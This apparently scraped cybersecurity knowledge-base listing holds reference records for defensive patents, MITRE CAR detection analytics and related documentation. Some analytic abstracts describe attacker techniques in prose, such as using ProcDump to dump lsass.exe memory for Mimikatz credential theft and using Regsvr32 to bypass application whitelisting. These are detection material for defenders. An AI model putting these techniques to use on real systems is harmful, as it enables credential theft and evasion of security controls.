  • "The present invention is a device for and method of accessing a network by initializing a database, an approved list, and a disapproved list; receiving an connectionless network packet; computing a flow tag based on the connectionless network packet; discarding the connectionless network packet and returning to the second step if the flow tag is on the disapproved list; allowing access to the network and returning to the second step if the flow tag is on the approved list; comparing the flow tag to the database if the flow tag is not on the approved list or the disapproved list; discarding the connectionless network packet, adding the flow tag to the disapproved list, and returning to the second step if the database rejects the flow tag; and allowing access to the network, adding the flow tag to the approved list, and returning to the second step if the database accepts the flow tag."

kb-author

  • "Patrick W. Dowd, John T. McHenry"

kb-mitre-analysis

  • ""

kb-organization

  • "National Security Agency"

rdfs:label

  • "Reference - Firewall for processing a connectionless network packet - National Security Agency"

kb-reference-of

kb-reference-title

  • "Firewall for processing a connectionless network packet"

Usage (5)

kb-abstract

  • "The present invention is a device for and method of accessing an information network by initializing a database, an ATM approved list, an IP approved list, and an IP disapproved list; receiving a datagram; discarding the datagram if it is not on the ATM approved list; determining the datagram's type; allowing access to the network and comparing the connection request, if any, to the database if the datagram is ATM signaling; discarding the datagram if the datagram is ATM signaling and the database denies the request; adding the request to the ATM approved list if the datagram is ATM signaling and the database allows the request; allowing access to the network if the datagram is ATM data that excludes IP data and the request is on the ATM approved list; computing a flow tag if the datagram is ATM data that includes IP data; discarding the datagram if the flow tag is on the IP disapproved list; allowing access to the network if the flow tag is on the IP approved list; comparing the flow tag to the database if the flow tag is neither on the IP approved list nor on the IP disapproved list; discarding the datagram and adding the flow tag to the IP disapproved list if the database rejects the flow tag; and allowing access to the network and adding the flow tag to the corresponding approved list if the database accepts the flow tag; and performing these steps on the next datagram"

kb-author

  • "Patrick W. Dowd, John T. McHenry"

kb-mitre-analysis

  • ""

kb-organization

  • "National Security Agency"

rdfs:label

  • "Reference - Firewall for processing connection-oriented and connectionless datagrams over a connection-oriented network - National Security Agency"

kb-reference-of

kb-reference-title

  • "Firewall for processing connection-oriented and connectionless datagrams over a connection-oriented network"

Usage (5)

kb-abstract

  • "Data transfer is controlled between a first network and a second network of computers by a firewall-proxy combination. Active interpretation of protocol commands exchanged between the first network and the second network is performed to determine specific actions concerning completion of the protocol request. This active firewall-proxy combination may exist on either the first or second network of computers. This method of control provides centralized control and administration for all potentially reachable resources within a network."

kb-author

  • "James E. Toga"

kb-mitre-analysis

  • ""

kb-organization

  • "Intel Corp"

rdfs:label

  • "Reference - Firewalls that filter based upon protocol commands - Intel Corp"

kb-reference-of

kb-reference-title

  • "Firewalls that filter based upon protocol commands"

Usage (5)

kb-abstract

  • "Methods, systems and machine-readable media for authenticating an end user for a client application are disclosed. According to one embodiment of the invention, a method of authenticating an end user for a client application using a directory service having an authentication control policy that tracks failed authentication attempts and allows lock out of an account after a predetermined number of failures comprises receiving end user identity information and security information at the client application; sending a search request to the directory service for an entry associated with the end user identity information and, if a match is found, receiving a authentication token from the directory service associated with the end user identity information; comparing the received authentication token with the security information; if the authentication token matches the security information, sending a request to update the directory service to indicate that successful authentication of the end user has occurred; and if the authentication token does not match the security information, sending a request to update the directory service to indicate that a failed attempt at authentication of the end user has occurred."

kb-author

  • "Buddhika Nandana Kottahachchi"

kb-mitre-analysis

  • ""

kb-organization

  • "Oracle International Corp"

rdfs:label

  • "Reference - Framework for notifying a directory service of authentication events processed outside the directory service - Oracle International Corp"

kb-reference-of

kb-reference-title

  • "Framework for notifying a directory service of authentication events processed outside the directory service"

Usage (5)

kb-abstract

  • ""

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • "Microsoft Docs"

rdfs:label

  • "Reference - /GS (Buffer Security Check) - Microsoft Docs"

kb-reference-of

kb-reference-title

  • "/GS (Buffer Security Check)"

Usage (5)

kb-abstract

  • "Regsvr32 can be used to execute arbitrary code in the context of a Windows signed binary, which can be used to bypass application whitelisting. This analytic looks for suspicious usage of the tool. It's not likely that you'll get millions of hits, but it does occur during normal activity so some form of baselining would be necessary for this to be an alerting analytic. Alternatively, it can be used for hunt by looking for new or anomalous DLLs manually."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-04-002: Generic Regsvr32 - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-04-002: Generic Regsvr32"

Usage (5)

kb-abstract

  • "A method of protecting a software program from unauthorized modification, and a system for practicing the method. The method utilizes self-protecting software code. Armed internally with self-defensive mechanisms, a self-protecting software program is tamper-resistant. Whenever its integrity is compromised, a self-protecting software program may become unusable due to software program crashes or other errors, or may generate subtle errors that do not immediately result render the program unusable but still result in incorrect software program execution. A self-protecting software program also may be able to repair itself to restore the integrity of its damaged code. The system comprises a computer program for automatically adding self-protection features to a software program."

kb-author

  • "Hoi Chang; Mikhail J. Atallah; John R. Rice"

kb-mitre-analysis

  • ""

kb-organization

  • "Purdue Research Foundation"

rdfs:label

  • "Reference - Guards for application in software tamperproofing - Purdue Research Foundation"

kb-reference-of

kb-reference-title

  • "Guards for application in software tamperproofing"

Usage (5)

kb-abstract

  • "The present disclosure relates to a system and method for monitoring system calls to an operating system kernel. A performance monitoring unit is used to monitor system calls and to gather information about each system call. The information is gathered upon interrupting the system call and can include system call type, parameters, and information about the calling thread/process, in order to determine whether the system call was generated by malicious software code. Potentially malicious software code is nullified by a malicious code counter-attack module."

kb-author

  • "Matthew D. Spisak"

kb-mitre-analysis

  • "This patent describes a technique for monitoring system calls to detect malicious software code. A system call monitoring module operates at the kernel level and traps system calls.
    Monitoring data includes:

    * information about the path to the file to be accessed by a system call.
    * the memory address or range of addresses to be accessed by a system call.
    * the context for the thread within operating system that will be interrupted by a system call.
    * the type of system call information about the socket that is being used by system call in order to send or receive data.
    * the history of system calls in order to monitor for specific sequences of system calls.
    * the frequency or periodicity of a particular system call or set of systems calls.

    Captured system call data is analyzed using data analysis algorithms such as machine learning algorithms, artificial intelligence algorithms, pattern recognition algorithms, or other known data analysis techniques. An alert is generated if it is likely that the system call was generated by malicious software code."

kb-organization

  • "Endgame Inc"

rdfs:label

  • "Reference - Hardware-assisted system and method for detecting and analyzing system calls made to an operting system kernel - Endgame Inc"

kb-reference-of

kb-reference-title

  • "Hardware-assisted system and method for detecting and analyzing system calls made to an operting system kernel"

Usage (5)

kb-abstract

  • "In some embodiments, heuristic botnet detection is provided. In some embodiments, heuristic botnet detection includes monitoring network traffic to identify suspicious network traffic; and detecting a bot based on a heuristic analysis of the suspicious network traffic behavior using a processor, in which the suspicious network traffic behavior includes command and control traffic associated with a bot master. In some embodiments, heuristic botnet detection further includes assigning a score to the monitored network traffic, in which the score corresponds to a botnet risk characterization of the monitored network traffic (e.g., based on one or more heuristic botnet detection techniques); increasing the score based on a correlation of additional suspicious behaviors associated with the monitored network traffic (e.g., based on one or more heuristic botnet detection techniques); and determining the suspicious behavior is associated with a botnet based on the score."

kb-author

  • "Xinran Wang; Huagang Xie"

kb-mitre-analysis

  • "This patent describes detecting botnets using heuristic analysis techniques on collected network flows. The heuristic techniques include:

    * Identifying suspicious traffic patterns to detect command and control traffic ex. periodically visiting a known malware URL, a host visiting a malware domain twice every 5 hour and 14 minutes (this is a specific pattern for a variant of Swizzor botnets).
    * Identifying non-standard behaviors such as connecting to a non-standard HTTP port for HTTP traffic, visiting a non-existent domain, downloading executable files with non-standard executable file extensions, communicating using HTTP header with a shorter than common length
    * Analyzing visited domain information to identify the following: visiting a domain with a domain name that is longer than a common domain name length, visiting a dynamic DNS domain, visiting a fast-flux domain, and visiting a recently created domain.

    A score is determined based on these factors and if the score is over a threshold, a responsive action is performed."

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - Heuristic botnet detection - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "Heuristic botnet detection"

Usage (5)

kb-abstract

  • "When entering on a host for the first time, an adversary may try to discover information about the host. There are several built-in Windows commands that can be used to learn about the software configurations, active users, administrators, and networking configuration. These commands should be monitored to identify when an adversary is learning information about the system and environment. The information returned may impact choices an adversary can make when establishing persistence, escalating privileges, or moving laterally.

    Because these commands are built in, they may be run frequently by power users or even by normal users. Thus, an analytic looking at this information should have well-defined white- or blacklists, and should consider looking at an anomaly detection approach, so that this information can be learned dynamically."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2016-03-001: Host Discovery Commands - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2016-03-001: Host Discovery Commands"

Usage (5)

kb-abstract

  • "In embodiments of the present invention improved capabilities are described for threat detection using a behavioral-based host-intrusion prevention method and system for monitoring a user interaction with a computer, software application, operating system, graphic user interface, or some other component or client of a computer network, and performing an action to protect the computer network based at least in part on the user interaction and a computer code process executing during or in association with a computer usage session."

kb-author

  • "Clifford C. Wright"

kb-mitre-analysis

  • "The patent describes a technique for performing behavior based threat detection. User and code behavior data is collected and stored to create baseline user and code behavior profiles. User behavior data collected over a user session or over multiple sessions can include a user:

    * clicking on a link
    * scrolling down a page
    * opening or closing a window
    * downloading a file
    * saving a file
    * running a file
    * typing a keyword

    Code behavior monitored includes code:

    * copying itself to a system folder
    * setting a run key to itself in the registry
    * setting a second runkey to itself in the registry in
    a different location
    * disabling OS tools in the registry
    * opening a hidden file

    The user interaction and the code process executed during the user session are monitored and compared with predetermined malicious behavior profiles that are typically present in a malicious user session. The predetermined collection of malicious behaviors are created based on analysis of families of malware in run time in a threat research facility. If a match is made an action is taken that can include isolating the computer on which the user interaction occurs and limiting network access to or from the computer."

kb-organization

  • "Sophos Ltd"

rdfs:label

  • "Reference - Host intrusion prevention system using software and user behavior analysis - Sophos Ltd"

kb-reference-of

kb-reference-title

  • "Host intrusion prevention system using software and user behavior analysis"

Usage (5)

kb-abstract

  • "ASLR (Address Space Layout Randomization) is a memory exploitation mitigation technique used on both Linux and Windows systems. Learn how to tell if it's running, enable/disable it, and get a view of how it works."

kb-author

  • "Sandra Henry-Stocker"

kb-mitre-analysis

  • ""

kb-organization

  • "Network World"

rdfs:label

  • "Reference - How ASLR protects Linux systems from buffer overflow attacks - Network World"

kb-reference-of

kb-reference-title

  • "How ASLR protects Linux systems from buffer overflow attacks"

Usage (5)

kb-organization

  • "IEEE"

rdfs:label

  • "Reference - IEEE Standard for Local and Metropolitan Area Networks - Station and Media Access Control Connectivity Discovery"

kb-reference-of

kb-reference-title

  • "IEEE Standard for Local and Metropolitan Area Networks - Station and Media Access Control Connectivity Discovery"

Usage (5)

kb-abstract

  • "Various embodiments pertain to communication network systems. In particular, various embodiments relate to multi-path probing in communication network systems that can be used to estimate the complete topology of the network. A method includes receiving data at a source node from a tracerouting probe in a network. The data includes information about at least one network node. The method also includes determining an identification for the at least one network node based on information. In addition, the method includes using the identification of the at least one network node to determine an identification of at least one device."

kb-author

  • "Tomas KUBIK, Lan Li, Tomas RYBKA, Karlo ZATYLNY, Chris O'Brien"

kb-organization

  • "SolarWinds Worldwide LLC"

rdfs:label

  • "Reference - Identification of traceroute nodes and associated devices"

kb-reference-title

  • "Identification of traceroute nodes and associated devices"

Usage (5)

kb-abstract

  • "Return-oriented programming (ROP) has become the
    primary exploitation technique for system compromise
    in the presence of non-executable page protections. ROP
    exploits are facilitated mainly by the lack of complete
    address space randomization coverage or the presence
    of memory disclosure vulnerabilities, necessitating additional ROP-specific mitigations.
    In this paper we present a practical runtime ROP exploit prevention technique for the protection of thirdparty applications. Our approach is based on the detection of abnormal control transfers that take place during
    ROP code execution. This is achieved using hardware
    features of commodity processors, which incur negligible runtime overhead and allow for completely transparent operation without requiring any modifications to
    the protected applications. Our implementation for Windows 7, named kBouncer, can be selectively enabled for
    installed programs in the same fashion as user-friendly
    mitigation toolkits like Microsoft's EMET. The results of
    our evaluation demonstrate that kBouncer has low runtime overhead of up to 4%, when stressed with specially
    crafted workloads that continuously trigger its core detection component, while it has negligible overhead for
    actual user applications. In our experiments with in-thewild ROP exploits, kBouncer successfully protected all
    tested applications, including Internet Explorer, Adobe
    Flash Player, and Adobe Reader."

kb-author

  • "Vasilis Pappas, Michalis Polychronakis, Angelos D. Keromytis
    Columbia University"

kb-organization

  • "Columbia University"

rdfs:label

  • "Reference - Indirect Branching Calls"

kb-reference-of

kb-reference-title

  • "Transparent ROP Exploit Mitigation using Indirect Branch Tracing"

Usage (5)

kb-abstract

  • "A security agent implemented on a monitored computing device is described herein. The security agent is configured to detect an action of interest (AoI) that may be probative of a security exploit and to determine a context in which that AoI occurred. Based on that context, the security agent is further configured to decide whether the AoI is a security exploit and can take preventative action to prevent the exploit from being completed.

    Determining that the AoI includes the security exploit is based at least in part on one or more of: determining that the return address is outside memory previously allocated for an object; determining that the object identifier is associated with a vulnerable object; determining that permissions of the memory region include two or more of read, write, and execute; or determining that the memory region is one page in length.

    Determining that the return address is outside memory previously allocated for an object and the method further including treating code that the return address points to as malicious code."

kb-author

  • "Daniel W. Brown; Ion-Alexandru Ionescu; Loren C. Robinson"

kb-mitre-analysis

  • ""

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Inferential exploit attempt detection - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Inferential exploit attempt detection"

Usage (5)

kb-abstract

  • "A method and system for automatic termination of unauthorized malevolent processes operating on an information handling system. A list of authenticated and essential process list is stored on the information handling system. Unauthorized processes not contained on the list can be automatically terminated by the user by invoking the present invention with a single click of a mouse or pointer device on an icon residing on the display screen of the information handling system. The offending processes are immediately terminated without generating a user prompt, which would ordinarily provide sufficient time for the malware to spawn additional offending processes. The present invention also provides significant means to recover control of a malware-infected information handling system in order to use repair tools and utilities. The present invention can be deployed at the time of manufacture of an information handling system or independently installed by a user."

kb-author

  • "Carlton Andrews"

kb-mitre-analysis

  • ""

kb-organization

  • "Dell Products LP"

rdfs:label

  • "Reference - Instant process termination tool to recover control of an information handling system - Dell Products LP"

kb-reference-of

kb-reference-title

  • "Instant process termination tool to recover control of an information handling system"

Usage (5)

kb-abstract

  • "Techniques utilizing library and pre-boot components to ensure that a driver associated with a kernel-mode component is initialized before other drivers during a boot phase are described herein. The library component is processed during a boot phase; the pre-boot component, which may be an alternative to the library component, is processed during a pre-boot phase. By ensuring that the driver is the first driver initialized, the components enable the driver to launch the kernel-mode component before other drivers are initialized. The library component may also determine whether another driver is to be initialized before the kernel-mode component driver, may ensure that kernel-mode component driver is initialized first, and may alert the kernel-mode component. Also, the library component may retrieve information that is to be deleted by the operating system before initialization of drivers and may provide that information to the kernel-mode component."

kb-author

  • "Ion-Alexandru Ionescu"

kb-mitre-analysis

  • "To compromise software or to gain control of a host device, a security exploit can modify driver initialization order used by an operating system and place a driver associated with the security exploit first in a list of drivers initialized by the operating system.

    This patent describes ensuring that a driver associated with the agent is initialized first. To ensure the driver is initialized first, a dependent DLL associated with the driver is configured to be processed before other dependent DLLs. The dependent DLL can be configured to be processed first by various methods, for example if processing is done in alphabetical order, changing its name to be processed first. The dependent DLL, once processed, executes a number of operations to ensure the driver associated with the agent is initialized first. Furthermore, if the initialization order is modified, an alert is provided to the kernel-mode component that notifies the kernel-mode component it was not first and the order had to be altered. It can then take additional actions such as additional monitoring or remediation."

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Integrity assurance through early loading in the boot phase - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Integrity assurance through early loading in the boot phase"

Usage (5)

kb-abstract

  • "A variety of techniques are disclosed for detection of advanced persistent threats and similar malware. In one aspect, the detection of certain network traffic at a gateway is used to trigger a query of an originating endpoint, which can use internal logs to identify a local process that is sourcing the network traffic. In another aspect, an endpoint is configured to periodically generate and transmit a secure heartbeat, so that an interruption of the heartbeat can be used to signal the possible presence of malware. In another aspect, other information such as local and global reputation information is used to provide context for more accurate malware detection."

kb-author

  • "Kenneth D. Ray"

kb-mitre-analysis

  • "This patent describes a health monitor deployed on an endpoint that uses a heartbeat to periodically communicate status to a gateway's remote health monitor. The endpoint health monitor issues a heartbeat for satisfactory status of the endpoint using factors such as:

    * checking the status of individual software items executing on the endpoint
    * checking that antivirus and other security software is up to date (e. g., with current virus definition files) and running correctly
    * checking the integrity of cryptographic key stores
    * checking other hardware or software components of the endpoint as necessary or helpful for health monitoring

    A disappearance of the heartbeat from the endpoint may indicate that the endpoint has been compromised."

kb-organization

  • "Sophos Ltd"

rdfs:label

  • "Reference - Intrusion detection using a heartbeat - Sophos Ltd"

kb-reference-of

kb-reference-title

  • "Intrusion detection using a heartbeat"

Usage (5)

kb-abstract

  • "LUKS is short for "Linux Unified Key Setup". It has initially been developed to remedy the unpleasantness a user experienced that arise from deriving the encryption setup from changing user space, and forgotten command line arguments. The result of this changes are an unaccessible encryption storage. The reason for this to happen was, a unstandardised way to read, process and set up encryption keys, and if the user was unlucky, he upgraded to an incompatible version of user space tools that needed a good deal of knowledge to use with old encryption volumes."

kb-author

  • "Clemens Fruhwirth"

rdfs:label

  • "Reference - LUKS1 On-Disk Format SpecificationVersion 1.2.3"

kb-reference-of

kb-reference-title

  • "LUKS1 On-Disk Format SpecificationVersion 1.2.3"

Usage (5)

kb-abstract

  • "LibreNMS has the ability to show you a network map based on:
    * xDP Discovery
    * MAC addresses"

kb-organization

  • "LibreNMS.org"

rdfs:label

  • "Reference - Libre NMS - Network Map Extension"

kb-reference-of

kb-reference-title

  • "Libre NMS - Network Map Extension"

Usage (5)

kb-abstract

  • "Integrating LibreNMS with Oxidized brings the following benefits:

    * Config viewing: Current, History, and Diffs all under the Configs tab of each device
    * Automatic addition of devices to Oxidized: Including filtering and grouping to ease credential management
    * Configuration searching"

kb-organization

  • "LibreNMS.org"

rdfs:label

  • "Reference - Libre NMS - Oxidized Extension"

kb-reference-of

kb-reference-title

  • "LibreNMSDocs - Oxidized Extension"

Usage (5)

kb-abstract

  • "ProcDump is a sysinternal command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.

    ProcDump may be used to dump the memory space of lsass.exe to disk for processing with a credential access tool such as Mimikatz. This is performed by launching procdump.exe as a privileged user with command line options indicating that lsass.exe should be dumped to a file with an arbitrary name."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-07-002: Lsass Process Dump via Procdump - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-07-002: Lsass Process Dump via Procdump"

Usage (5)

kb-abstract

  • "Vulnerability, patch, and configuration management are not new security topics. In fact, they are some of the oldest security functions. Yet, we still struggle to manage these capabilities effectively. The quantity of outstanding vulnerabilities for most large organizations is overwhelming, and all organizations struggle to keep up with the never-ending onslaught of new vulnerabilities in their infrastructure and applications. When you add in the cloud and the increasing speed with which all organizations must deliver systems, applications, and features to both their internal and external customers, security may seem unachievable. This course will show you the most effective ways to mature your vulnerability management program and move from identifying vulnerabilities to successfully treating them. 16 Cyber42 and lab exercises"

kb-author

  • "Jonathan Risto and David Hazar"

kb-organization

  • "SANS"

rdfs:label

  • "Reference - MGT516: Managing Security Vulnerabilities: Enterprise and Cloud"

kb-reference-of

kb-reference-title

  • "MGT516: Managing Security Vulnerabilities: Enterprise and Cloud"

Usage (5)

kb-abstract

  • "A system and method for detecting malicious relay communications is disclosed. Network communications can be received and analyzed using such network components as a network switch. The received traffic can be parsed into sessions. Relay metadata can be extracted from the sessions and further be used to categorize the sessions into one or more types of relay metadata behaviors. Once a significant amount of sessions are detected an alarm may be triggered and/or alarm data may be generated for analysis by network security administrators."

kb-author

  • "Ryan James PRENGER; Nicolas BEAUCHESNE; Karl Matthew LYNN"

kb-mitre-analysis

  • "This patent describes a technique for detecting relay networks, i.e. an attacker outside of the organization's network takes control of an internal host to be used as a source of attacks against other internal targets or exfiltrate data out of the organization. In this defensive technique, metadata from collected network packet captures is extracted to categorize network sessions using known relay behaviors. Information such as the number of bytes sent to and from a potential internal relay host, time of session initiation, packet contents, packet size, flow direction, and packet arrival time statistics are used to categorize the sessions and identify relay behavior. This technique assumes that relay network connections' inter-packet arrival times exhibit a high degree of variance in comparison to standard client-to-server connections. If enough evidence of relay behavior is gathered about a given internal host, the host is identified as suspicious and an alert is generated."

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - Malicious relay detection on networks - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "Malicious relay detection on networks"

Usage (5)

kb-abstract

  • "In some embodiments, a malware analysis system includes receiving a potential malware sample from a firewall; analyzing the potential malware sample using a virtual machine to determine if the potential malware sample is malware; and automatically generating a signature if the potential malware sample is determined to be malware. In some embodiments, the potential malware sample does not match a preexisting signature, and the malware is a zero-day attack."

kb-author

  • "Huagang Xie; Xinran Wang; Jiangxia Liu"

kb-mitre-analysis

  • "This patent describes a VM sandbox environment that uses heuristic based analysis techniques performed in real-time during a file transfer to determine if the file is malicious. A new signature can then be generated and distributed to automatically block future file transfer requests to download the malicious file."

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - Malware analysis system - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "Malware analysis system"

Usage (5)

kb-abstract

  • "Example techniques locate or identify malware based on events from or at monitored computing devices. A control unit can detect a sequence of events of various types. The control unit can locate a loop within the sequence of events based at least in part on relative frequencies of the event types. The control unit can determine a distribution of event types of the events within the loop, and determining that software running the sequence is associated with malware based at least in part on the distribution of event types within the loop. In some examples, the control unit can locate a point of commonality among a plurality of stack traces associated with respective events within the loop. The control unit can determine a malware module comprising the point of commonality."

kb-author

  • "Daniel W. Brown"

kb-mitre-analysis

  • "The patent describes determining if a sequence of events associated with a process are associated with malware. Based on the relative frequency of events, a loop within a sequence of events is located and a distribution of the events within the loop is determined. The distribution of events is then compared against a catalog of distributions to determine if it is associated with malware."

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Malware detection in event loops - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Malware detection in event loops"

Usage (5)

kb-abstract

  • "Example techniques herein determine that a trial data stream is associated with malware ("dirty") using a local computational model (CM). The data stream can be represented by a feature vector. A control unit can receive a first, dirty feature vector (e.g., a false miss) and determine the local CM based on the first feature vector. The control unit can receive a trial feature vector representing the trial data stream. The control unit can determine that the trial data stream is dirty if a broad CM or the local CM determines that the trial feature vector is dirty. In some examples, the local CM can define a dirty region in a feature space. The control unit can determine the local CM based on the first feature vector and other clean or dirty feature vectors, e.g., a clean feature vector nearest to the first feature vector."

kb-author

  • "Sven Krasser,David Elkind, Patrick Crenshaw, Kirby James Koster"

kb-mitre-analysis

  • ""

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Malware detection using local computational models - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Malware detection using local computational models"

Usage (5)

kb-abstract

  • "A method and apparatus for detecting malicious websites is disclosed."

kb-author

  • "John Burnet MUNRO, IV; Jason Aaron Trost; Zachary Daniel HANIF"

kb-mitre-analysis

  • "This patent describes a domain classification engine on the host computer that analyzes URLs clicked by a user or entered into a web browser to visit a website. URL analysis is done by using a combination of techniques:

    * Feature extraction: A URL is analyzed against features associated with suspicious URLs such as % of longest consecutive digits in a subdomain, % of longest repeated characters in a subdomain, % of vowels in a high level domain.

    * Markov analysis: The probability of a digit occurring in normal language given the preceding two digits is determined. For example, if the received URL is google.com, the probability of a 'g' occurring at the beginning of a word, the probability of an 'o' occurring after a "g, the probability of an "o' occurring after a 'g' and "o, and so forth will be determined. The probability of each digit is then multiplied to get a probability for the whole domain name. Probabilities are determined based on a database of existing usage, such as a dictionary, or a list of known good domain names

    * Domain names are compared against an existing dataset of known unauthorized domain names.

    A rating is developed based on the results of these techniques, and if the rating is over a set threshold, an action is taken such as blocking access or generating an alert."

kb-organization

  • "Endgame Inc"

rdfs:label

  • "Reference - Method and Apparatus for Detecting Malicious Websites - Endgame Inc"

kb-reference-of

kb-reference-title

  • "Method and Apparatus for Detecting Malicious Websites"

Usage (5)

kb-abstract

  • "The method and apparatus for increasing the speed at which computer viruses are detected stores initial state information concerning the file or volume which is being examined for a virus. This information is stored in a cache in a non-volatile storage medium and when files are subsequently scanned for viruses, the current state information is compared to the initial state information stored in the cache. If the initial state information differs from the current state information then the file or volume is scanned for viruses which change the state information of the file or volume. If the initial state information and current state information is the same then the file or volume is scanned for a subset of viruses which do not change the state information."

kb-author

  • "Paul D. Cozza"

kb-mitre-analysis

  • ""

kb-organization

  • "McAfee LLC"

rdfs:label

  • "Reference - Method and apparatus for increasing the speed at which computer viruses are detected - McAfee LLC"

kb-reference-of

kb-reference-title

  • "Method and apparatus for increasing the speed at which computer viruses are detected"

Usage (5)

kb-abstract

  • "A system and method for assessing the identity fraud risk of an entity's (a user's, computer process's, or device's) behavior within a computer network and then to take appropriate action. The system uses real-time machine learning for its assessment. It records the entity's log-in behavior (conditions at log-in) and behavior once logged in to create an entity profile that helps identify behavior patterns. The system compares new entity behavior with the entity profile to determine a risk score and a confidence level for the behavior. If the risk score and confidence level indicate a credible identity fraud risk at log-in, the system can require more factors of authentication before log-in succeeds. If the system detects risky behavior after log-in, it can take remedial action such as ending the entity's session, curtailing the entity's privileges, or notifying a human administrator."

kb-author

  • "Yanlin Wang; Weizhi Li"

kb-mitre-analysis

  • "This patent describes determining a confidence score to detect anomalies in user activity based on comparing a user's behavior profile with current user activity events. The following types of events are used to develop a user entity profile:

    * logon and logoff times and locations
    * starting or ending applications
    * reading or writing files
    * changing an entity 's authorization
    * monitoring network traffic

    User events that deviate from the entity profile over a certain threshold trigger a remedial action."

kb-organization

  • "Idaptive LLC"

rdfs:label

  • "Reference - Method and Apparatus for Network Fraud Detection and Remediation Through Analytics - Idaptive LLC"

kb-reference-of

kb-reference-title

  • "Method and Apparatus for Network Fraud Detection and Remediation Through Analytics"

Usage (5)

kb-abstract

  • "A method and apparatus for utilizing a token which is preferably a "dumb token" to provide secure access by authorized users to a selected resource. The token stores a secret user code in machine readable form, which code is read by a token processor. The token processor also receives a time-varying value and an algorithm, both of which may be stored or generated at either the token or the token processor and preferably a secret personal identification code which may be inputted at the token, but is preferably inputted at the token processor. The secret user code, time-varying value and secret personal identification code are then algorithmically combined by the algorithm, preferably in the token processor, to generate a one-time nonpredictable code which is transmitted to a host processor. The host processor utilizes the received one-time nonpredictable code to determine if the user is authorized access to the resource and grants access to the resource if the user is determined to be authorized. The system may be modified to operate in query/response mode. The token processor may be any of a variety of available portable remote processors or may be a device such as a telephone which is equipped with card or other token reader and with processing capability."

kb-author

  • "Kenneth P. Weiss"

kb-mitre-analysis

  • ""

kb-organization

  • "Rsa Security Inc."

rdfs:label

  • "Reference - Method and apparatus for utilizing a token for resource access - Rsa Security Inc."

kb-reference-of

kb-reference-title

  • "Method and apparatus for utilizing a token for resource access"

Usage (5)

kb-abstract

  • "A method and system for detecting algorithm-generated domains (AGDs) is disclosed wherein domain names requested by an internal host are categorized or classified using curated data sets, active services (e.g. Internet services), and certainty scores to match domain names to domain names or IP addresses used by command and control servers."

kb-author

  • "James Patrick HARLACHER; Aditya Sood; Oskar Ibatullin"

kb-mitre-analysis

  • "This patent describes detecting algorithm generated domains (AGD). DNS requests and responses are analyzed by first checking whether the domain matches existing data sets that specify different types of AGDs with known characteristics, such as Evil Twin Domains, Sinkholed domains, sleeper cells, ghost domains, parked domains, and/or bulk-registered domains. In addition to comparing domains against known data sets, the following information is collected to perform analysis:

    * IP Information: checks for information known about the IP addresses returned in the DNS response, including the number of IP addresses returned, the registered owners of the IP addresses, or different IP addresses returned for the same domain (IP fluxing)
    * Domain Registration: examines the domain registration date, domain update date, domain expiration date, registrant identity, and authorized name servers associated with a specific domain name.
    * Domain Popularity: provides information on the popularity of a domain name.

    Based on analysis of these factors a score is developed; if the score is above a certain threshold, an alert is generated."

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - Method and system for detecting algorithm-generated domains - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "Method and system for detecting algorithm-generated domains"

Usage (5)

kb-abstract

  • "A detection engine may be implemented by receiving network traffic and processing the traffic into one or more session datasets. Sessions not initiated by an internal host may be discarded. The frequency between the communication packets from the internal host to external host may be grouped or processed into rapid-exchange instances. The number of rapid-exchange instances, the time intervals between them, and/or the rhythm and directions of the initiation of the instances may be analyzed to determine that a human actor is manually controlling the external host. In some embodiments, when it is determined that only one human actor is involved, alarm data may be generated that indicates that a network intrusion involving manual remote control has occurred or is underway."

kb-author

  • "Nicolas BEAUCHESNE; Ryan James PRENGER"

kb-mitre-analysis

  • "This patent describes detecting an external attacker taking remote control of an internal host. Detection includes identifying sessions where the external host controls the internal host in the opposite direction the session was initiated. The number of rapid-exchange communication instances (i.e, communications that occur between the two hosts with little silence gap), the time intervals between them, and/or the rhythm and direction of the instances, are analyzed to determine if an external human actor is manually controlling the internal host."

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - Method and system for detecting external control of compromised hosts - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "Method and system for detecting external control of compromised hosts"

Usage (5)

kb-abstract

  • "Disclosed is an improved method, system, and computer program product for identifying malicious payloads. The disclosed approach identifies potentially malicious payload exchanges which may be associated with payload injection or root-kit magic key usage.

    Some examples of data inputs:
    Information for clients and servers, such as IP address and host information
    Payloads for both clients and servers
    Amount of data being transferred
    Duration of communications
    Length of time delay between client request and server response"

kb-author

  • "Nicolas Beauchesne; John Steven Mancini"

kb-mitre-analysis

  • "Extraction of network flow data and using unsupervised machine learning to create a standard baseline. During the monitoring phase, abnormal network metadata will result in an alert."

kb-organization

  • "Vectra Networks Inc"

rdfs:label

  • "Reference - Method and system for detecting malicious payloads - Vectra Networks Inc"

kb-reference-of

kb-reference-title

  • "Method and system for detecting malicious payloads"

Usage (5)

kb-abstract

